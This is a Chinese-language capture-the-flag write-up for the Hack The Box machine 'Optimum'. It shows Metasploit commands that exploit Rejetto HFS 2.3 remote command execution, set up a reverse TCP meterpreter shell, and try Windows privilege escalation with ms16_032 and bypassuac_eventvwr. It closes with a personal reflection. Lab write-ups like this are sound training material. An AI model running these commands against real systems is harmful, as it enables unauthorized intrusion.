Optimum(win64-msf提权)

Optimum(win64-msf提权)

参考资料:https://isroot.nl/2018/06/25/hack-the-box-write-up-optimum/

1
2
3
4
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

命令

1
2
3
4
5
6
7
8
9
10
11
searchsploit hfs
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution

msfconsole
use exploit/windows/http/rejetto_hfs_exec
set RHOST 10.10.10.8
set LHOST 10.10.14.17
set SRVHOST 10.10.14.17 
run

background

sysinfo

1
2
3
4
5
6
7
Computer        : OPTIMUM
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
search suggester
use post/multi/recon/local_exploit_suggester

[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.

use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set LHOST tun0
set LHOST tun0  不知道为什么要设置两遍,才能成功设置为该网卡
run
失败,用户不是admin组,不能提权

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set LHOST tun0
set LHOST 10.10.14.17
set SESSION 1
show options
run
提权依然失败。

shell
whoami
optimum\kostas

net user
Administrator            Guest                    kostas

writeup

job.rc

1
2
3
4
5
6
use exploit/windows/http/rejetto_hfs_exec
set RHOST 10.10.10.8
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.17
set SRVHOST 10.10.14.17 
run

msfconsle -r job.rc

用sysinfo命令,可以发现Meterpreter : x32/windows,而目标系统是64位。


没有发现任何可用exp,可用来提权。
获得了SESSION 4

search CVE-2016-0099
search CVE-2017-0100

1
2
3
4
5
6
7
search exploit/windows/local
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 1
set LPORT 4445
set LHOST 10.10.14.17
set target 1        target0代表winx86, target1 代表winx64

又失败了

问题

在meterpreter上传文件的时候,会遇到这种问题:
core_channel_open: Operation failed: Access is denied

可能是权限不够
解决方法: 用lcd,getlwd切换本地目录,用cd切换到C:\Users\kostas\Desktop

再次提权

提权工具:https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/README.md
执行的命令:python windows-exploit-suggester.py --database 2019-02-07-mssb.xls --systeminfo sys.txt
找到可用提权的漏洞,然后msf上传exe到有执行权限的目录,即可得到最高权限。

总结

世界上的事情分为两种:

一种是努力过以后可以做到的;一种是无论自己怎么努力,也是做不到的。

首先要努力,才知道自己的极限。然后坦然接受结果。

1
2
3
4
5
6
逆来顺受、随波逐流、浑浑噩噩地也是一辈子,一直卡着自己的脖子往上爬,摔下来痛苦一场,再咬牙继续往上爬,也算一辈子。
  结果怎么样,谁也不能未卜先知。  
  前者觉得后者累、自讨苦吃,后者觉得前者糊里糊涂、可怜。
  各有各的活法,谁也不能说谁错,可是人得挑一种对得起自己的活法——所谓对得起自己,就是甘当废柴也好,逆水行舟也好,都得坦坦荡荡。
  愿意活得轻松自在的,看见别人香车宝马、功成名就,得能没有一点艳羡之心,知道自己是怎么回事,所以无论遇到什么事,也绝不会不甘心。至于那些知道自己一定会不甘心的,最好就马上洗干净脸,该干什么干什么去。
  任何时候,都不会后悔,不会焦虑,不会讨厌自己,不会觉得自己浪费了生命,那就是对得起自己的活法。